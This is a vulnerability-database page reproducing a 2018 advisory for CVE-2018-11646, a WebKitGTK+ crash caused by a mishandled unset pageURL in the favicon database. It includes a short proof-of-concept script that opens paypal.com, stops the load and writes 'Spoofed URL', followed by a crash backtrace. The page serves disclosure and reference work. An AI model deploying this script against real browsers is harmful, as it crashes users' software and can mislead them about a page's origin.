Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service

🗓️ 05 Jun 2018 00:00:00Reported by Mishra DhirajType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

WebKitGTK+ 2.21.3 pageURL Mishandling Denial Of Service, CVE-2018-11646

Related
Code
ReporterTitlePublishedViews
Family
0day.today		WebKitGTK+ < 2.21.3 - pageURL Mishandling Crash (PoC) Exploit
6 Jun 201800:00
zdt
0day.today		WebKitGTK+ < 2.21.3 - #WebKitFaviconDatabase DoS Exploit
11 Jun 201800:00
zdt
Circl		CVE-2018-11646
21 Jun 201821:37
circl
CNVD		Apple Safari Technology Preview WebKit Denial of Service Vulnerability (CNVD-2018-11311)
5 Jun 201800:00
cnvd
CVE		CVE-2018-11646
1 Jun 201813:00
cve
Cvelist		CVE-2018-11646
1 Jun 201813:00
cvelist
Debian CVE		CVE-2018-11646
1 Jun 201813:00
debiancve
Exploit DB		WebKitGTK+ &lt; 2.21.3 - Crash (PoC)
5 Jun 201800:00
exploitdb
Exploit DB		WebKitGTK+ &lt; 2.21.3 - &#039;WebKitFaviconDatabase&#039; Denial of Service (Metasploit)
11 Jun 201800:00
exploitdb
exploitpack		WebKitGTK+ 2.21.3 - WebKitFaviconDatabase Denial of Service (Metasploit)
11 Jun 201800:00
exploitpack
Rows per page
`Summary:  
  
webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/API/glib/WebKitFaviconDatabase.cpp in WebKit, as used in WebKitGTK+ through 2.21.3, mishandle an unset pageURL, leading to an application crash, CVE-2018-11646 was assigned to this issue.  
  
PoC Author: @magicmac2000  
Found Issue in Webkit: Dhiraj Mishra (Team w00t)  
  
PoC:  
  
<script>  
win = window.open("sleep_one_second.php", "WIN");   
window.open("https://www.paypal.com", "WIN");   
win.document.execCommand('Stop');   
win.document.write("Spoofed URL");   
win.document.close();  
</script>  
  
  
Backtrace using fedora 27:  
  
#0 WTF::StringImpl::rawHash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508  
#1 WTF::StringImpl::hasHash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514  
#2 WTF::StringImpl::hash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525  
#3 WTF::StringHash::hash  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73  
#9 WTF::HashMap, WTF::HashTraits >::get  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406  
#10 webkitFaviconDatabaseSetIconURLForPageURL  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193  
#11 webkitFaviconDatabaseSetIconForPageURL  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318  
#12 webkitWebViewSetIcon  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964  
#13 WTF::Function::performCallbackWithReturnValue  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108  
#15 WebKit::WebPageProxy::dataCallback  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083  
#16 WebKit::WebPageProxy::finishedLoadingIcon  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848  
#17 IPC::callMemberFunctionImpl::operator()  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68  
#29 WTF::RunLoop::::_FUN(gpointer)  
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70  
#30 g_main_dispatch  
at gmain.c line 3148  
#31 g_main_context_dispatch  
at gmain.c line 3813  
#32 g_main_context_iterate  
at gmain.c line 3886  
#33 g_main_context_iteration  
at gmain.c line 3947  
#34 g_application_run  
at gapplication.c line 2401  
#35 main  
at ../src/ephy-main.c line 432   
  
  
Reference's:  
  
https://bugs.webkit.org/show_bug.cgi?id=186164  
https://bugzilla.gnome.org/show_bug.cgi?id=795740   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jun 2018 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.75346
webkitwebkitgtk+denial of servicecve-2018-11646mishandlingpageurlwebkitgtk+ 2.21.3favicon databasedhiraj mishraspoofed urlpaypalfedora 27webpageproxybugzillagnome
33